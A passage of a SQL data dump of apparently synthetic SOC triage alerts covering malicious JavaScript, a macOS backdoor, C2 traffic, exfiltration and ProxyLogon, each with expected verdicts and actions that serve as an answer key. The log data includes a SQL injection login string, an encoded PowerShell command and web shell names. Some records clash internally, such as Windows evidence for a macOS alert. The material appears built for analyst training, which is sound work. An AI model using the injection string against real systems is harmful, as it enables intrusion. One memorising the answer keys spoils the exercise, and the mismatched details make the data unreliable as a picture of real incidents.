distribution\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(335, 'Obfuscated JavaScript Execution', 'high', 'Browser Security Logs', 'The obfuscated JavaScript payload is executed on visitor\'s browsers, preparing the system for malware deployment. This indicates the transition from web-based compromise to client-side infection.', 'Execution', 'T1059.007 - JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:57Z\",\"event_id\":\"JS-Exec-20231015-143\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.15\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"script_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"affected_user\":\"jdoe\",\"script_name\":\"obfuscated_payload.js\",\"referrer\":\"http://malicious-example.com/landing\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel DB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known JavaScript exploit kit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"obfuscated_payload.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File name associated with obfuscated scripts used in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.930Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:57Z\\\",\\\"event_id\\\":\\\"JS-Exec-20231015-143\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 
Safari/537.36\\\",\\\"script_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"affected_user\\\":\\\"jdoe\\\",\\\"script_name\\\":\\\"obfuscated_payload.js\\\",\\\"referrer\\\":\\\"http://malicious-example.com/landing\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(336, 'Custom Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker has successfully installed a custom backdoor on macOS systems. This persistence mechanism allows continuous access and control over the infected systems of users who visited the compromised site.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"persistence\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"file_path\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"launchd\",\"process_id\":1234,\"sha256_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known macOS backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to maintain persistence for a 
backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(337, 'Command and Control (C2) Communication Detected', 'high', 'Network Traffic Analysis', 'This alert highlights the establishment of communication between the backdoor and the attacker\'s C2 servers, enabling further actions.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.92.220.133\",\"protocol\":\"HTTP\",\"method\":\"POST\",\"url\":\"http://malicious-domain.com/command\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"payload\":\"Encrypted data\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain associated with C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known for malware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(338, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized transfer of sensitive data was detected. The attacker attempted to exfiltrate proprietary data from the internal network to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"EXFIL-2023-10-15-142235\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_Q3.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"blocked\",\"alert_trigger\":\"Data Exfiltration Policy\",\"bytes_transferred\":1048576,\"description\":\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file hash for sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR System\",\"verdict\":\"internal\",\"details\":\"Employee account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Document Management 
System\",\"verdict\":\"sensitive\",\"details\":\"Confidential financial document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external 
IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.933Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-10-15-142235\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_Q3.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_trigger\\\":\\\"Data Exfiltration Policy\\\",\\\"bytes_transferred\\\":1048576,\\\"description\\\":\\\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(339, 'Initial Access via ProxyLogon Zero-Day', 'critical', 'Exchange server logs', 'Hafnium exploits the ProxyLogon zero-day vulnerabilities to breach the organization\'s perimeter defenses, marking the beginning of their operation.', 'Exploit', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-17T04:12:34Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username\":\"SYSTEM\",\"exploit\":\"ProxyLogon\",\"url\":\"/owa/auth/x.js\",\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"shell.aspx\"}', '2026-01-03 00:04:00', '2026-02-18 12:19:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with ProxyLogon exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with web shell used in ProxyLogon exploit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis_tool\",\"verdict\":\"malicious\",\"details\":\"Web shell file used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"shell.aspx\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T04:12:34Z\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dest_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"exploit\\\":\\\"ProxyLogon\\\",\\\"url\\\":\\\"/owa/auth/x.js\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; 